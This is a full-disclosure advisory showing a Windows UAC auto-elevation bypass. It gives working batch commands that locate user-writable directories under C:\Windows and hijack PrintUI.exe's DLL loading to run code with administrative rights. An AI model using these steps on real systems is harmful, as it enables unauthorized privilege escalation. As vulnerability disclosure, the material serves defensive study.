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## https://sploitus.com/exploit?id=PACKETSTORM:162402
Hi @ll,  
  
Microsoft still ships Windows with and lets it create user-writable  
directories below the "Windows" directory %SystemRoot%\ -- despite  
that, with exception of %SystemRoot%\Temp\, they are all used to  
store DATA and SHOULD have been placed below %ProgramData% alias  
%SystemDrive%\ProgramData\ instead!  
  
JFTR: %ProgramData% was introduced with Windows Vista more than 15  
(in words: FIFTEEN) years ago, but Microsoft obviously just  
doesn't care to cleanup their mess.  
  
Authenticode signature verification, for example required to color the  
UAC prompt yellow (untrusted) or blue (trusted) and as precondition  
for the "auto-elevation" (mis)feature of some 63+ applications shipped  
with Windows 7 and ALL later versions, doesn't care about the filename  
of an executable, but (eventually) evaluates the pathname of the  
(application) directory.  
  
  
Put together these two weaknesses allow to run arbitrary code WITH  
administrative rights in several (user-writable) directories below  
C:\Windows: in the account created during Windows setup without UAC  
prompt, in (unprivileged) standard user accounts with (blue) UAC prompt!  
  
CVSS 3.0 score: 8.2 (High)  
CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H  
  
  
Demonstration  
~~~~~~~~~~~~~  
  
1. Log on to an arbitrary unprivileged (standard) user account and start  
the command processor, then run the following command lines to detect  
the user-writable directories below %SystemRoot%\ through creation of  
a hardlink named WRITABLE.EXE and collect their pathnames in the file  
%ProgramData%\WRITABLE.LOG:  
  
COPY /Y NUL: "%ProgramData%\WRITABLE.LOG" && (  
DIR "%SystemRoot%" /A:D /B /S 1>"%ProgramData%\WRITABLE.TMP" && (  
FOR /F "Delims= UseBackQ" %? IN ("%ProgramData%\WRITABLE.TMP") DO @(  
MKLINK /H "%~?\WRITABLE.EXE" "%ProgramData%\WRITABLE.LOG" 2>NUL: && 1>>"%ProgramData%\WRITABLE.LOG" ECHO %~?))  
TYPE "%ProgramData%\WRITABLE.LOG")  
  
On fresh installations of Windows 10 2004/20H1/20H2 for AMD64 alias  
x64 processors this yields the following pathnames:  
  
C:\Windows\Tasks  
C:\Windows\Temp  
C:\Windows\tracing  
C:\Windows\Registration\CRMLog  
C:\Windows\System32\FxsTmp  
C:\Windows\System32\Tasks  
C:\Windows\System32\Com\dmp  
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys  
C:\Windows\System32\spool\PRINTERS  
C:\Windows\System32\spool\SERVERS  
C:\Windows\System32\spool\drivers\color  
C:\Windows\SysWOW64\FxsTmp  
C:\Windows\SysWOW64\Tasks  
C:\Windows\SysWOW64\Com\dmp  
  
On installations which were upgraded to (any version of) Windows 10,  
the following additional pathname is typically listed:  
  
C:\Windows\System32\Tasks_Migrated  
  
On installations which have been used for some time, the following  
additional pathnames are typically listed:  
  
C:\Windows\debug\WIA  
C:\Windows\PLA\Reports  
C:\Windows\PLA\Rules  
C:\Windows\PLA\Templates  
C:\Windows\PLA\Reports\de-DE  
C:\Windows\PLA\Reports\en-GB  
C:\Windows\PLA\Reports\en-US  
...  
C:\Windows\PLA\Reports\ru-RU  
C:\Windows\PLA\Rules\de-DE  
C:\Windows\PLA\Rules\en-GB  
C:\Windows\PLA\Rules\en-US  
...  
C:\Windows\PLA\Rules\ru-RU  
C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}  
C:\Windows\System32\LogFiles\WMI  
  
  
2. Let's see whether the hardlinks WRITABLE.EXE can be (ab)used: copy an  
arbitrary executable to all of them and execute it.  
  
JFTR: PrintUI.exe is one of the 63+ applications which have UAC auto-  
elevation enabled.  
  
SETLOCAL ENABLEDELAYEDEXPANSION  
COPY /Y "%ProgramData%\WRITABLE.LOG" "%ProgramData%\WRITABLE.TMP" && (  
COPY /Y "%SystemRoot%\System32\PrintUI.exe" "%ProgramData%\WRITABLE.LOG" && (  
FOR /F "Delims= UseBackQ" %? IN ("%ProgramData%\WRITABLE.TMP") DO (  
START "" /WAIT "%~?\WRITABLE.EXE"  
ECHO !ERRORLEVEL!)))  
  
In unprivileged (standard) user accounts this triggers an UAC prompt  
for each file executed, some yellow, showing "Publisher: Unknown",  
some blue showing "Verified Publisher: Microsoft Windows".  
  
After giving consent to the UAC prompt a dialog box showing usage  
instructions for PrintUI.dll is displayed, indicating that (the copy  
of) PrintUI.exe loads PrintUI.dll:  
  
| Usage: rundll32 printui.dll,PrintUIEntry [options] [@commandfile]  
  
JFTR: since PrintUI.exe runs elevated, PrintUI.dll runs elevated too!  
  
  
3. Let's verify the Authenticode signature of the copy of PrintUI.exe:  
  
SignTool.exe VERIFY /A /V "%ProgramData%\WRITABLE.LOG"  
  
| Verifying: C:\ProgramData\WRITABLE.LOG  
| File is signed in catalog: C:\Windows\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-  
00C04FC295EE}\ntexe.cat  
...  
| Successfully verified: C:\ProgramData\WRITABLE.LOG  
...  
  
Authenticode doesn't care about the path/filename of signed executables,  
even for files with detached signatures, although the *.CAT files used  
to distribute detached digital signatures can store the filename!  
  
  
4. Let's see whether PrintUI.exe follows the guidance given by the MSRC  
(Microsoft Security Response Center) in the almost 7 year old blog post  
<https://blogs.technet.microsoft.com/srd/2014/05/13/load-library-safely/>.  
the more than 10 year old security advisory  
<https://technet.microsoft.com/en-us/library/2269637.aspx>, or the nearly  
10 year old MSKB articles <https://support.microsoft.com/en-us/kb/2389418>  
and <https://support.microsoft.com/en-us/kb/2533623>: copy ShUnimpl.dll  
as PrintUI.dll next to the copy of PrintUI.exe and execute the latter.  
  
JFTR: ShUnimpl.dll is the graveyard for obsolete "shell" functions; its  
_DllMainCRTStartup() entry point function returns FALSE to disable  
their use, lets the module loader fail with NTSTATUS 0xC0000142  
alias STATUS_DLL_INIT_FAILED, and lets LoadLibrary() fail with the  
Win32 error 1114 alias ERROR_DLL_INIT_FAILED  
  
COPY "%SystemRoot%\System32\ShUnimpl.dll" "%ProgramData%\PrintUI.dll"  
RENAME "%ProgramData%\WRITABLE.LOG" PrintUI.exe  
START "" /WAIT "%ProgramData%\PrintUI.exe"  
CERTUTIL.exe /ERROR %ERRORLEVEL%  
  
OUCH: (the copy of) PrintUI.exe loads an arbitrary PrintUI.dll from its  
application directory instead of %SystemRoot%\System32\PrintUI.dll  
  
The Common Weaknesses and Exposures classifies such misbehavior, which  
results in arbitrary code execution (here with escalation of privilege),  
as  
- CWE-426: Untrusted Search Path  
<https://cwe.mitre.org/data/definitions/426.html>  
- CWE-427: Uncontrolled Search Path Element  
<https://cwe.mitre.org/data/definitions/427.html>  
  
The Common Attack Pattern Enumeration and Classification lists it as  
- CAPEC-471: Search Order Hijacking  
<https://capec.mitre.org/data/definitions/471.html>  
  
JFTR: (un)fortunately PrintUI.dll is not the only DLL that PrintUI.exe  
loads from an unsafe path, and (un)fortunately PrintUI.exe is not  
the only auto-elevating application which loads DLLs from unsafe  
paths!  
  
A really big "Hooray!" to Microsoft's sloppy, careless and clueless  
developers as well as their sound asleep quality^Wmiserability assurance!  
  
  
5. Let's see whether UAC auto-elevation is also possible in at least one  
of the user-writable directories: log on to the UAC-controlled user  
account created during Windows setup, start an UNELEVATED (unprivileged)  
command prompt and run the following command lines:  
  
SETLOCAL ENABLEDELAYEDEXPANSION  
FOR /F "Delims= UseBackQ" %? IN ("%ProgramData%\WRITABLE.TMP") DO (  
MKLINK /H "%~?\PrintUI.dll" "%ProgramData%\PrintUI.dll" && (  
START "" /WAIT "%~?\WRITABLE.EXE"  
ECHO !ERRORLEVEL!))  
  
BINGO: GAME OVER!  
  
UAC performs auto-elevation at least in the directories  
C:\Windows\System32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\  
and C:\Windows\System32\Tasks_Migrated\; a copy of PrintUI.exe run in  
these directories loads/executes an arbitrary PrintUI.dll placed there  
too, with ADMINISTRATIVE privileges, without UAC prompt.  
  
JFTR: even without UAC auto-elevation, this beginner's error present in  
PrintUI.exe (really: almost all applications shipped with Windows)  
allows to fool Jane and Joe Average who typically give consent to a  
blue UAC prompt which shows "Certified Publisher: Microsoft Windows".  
  
  
stay tuned, and far away from Microsoft's eternally vulnerable crap!  
Stefan Kanthak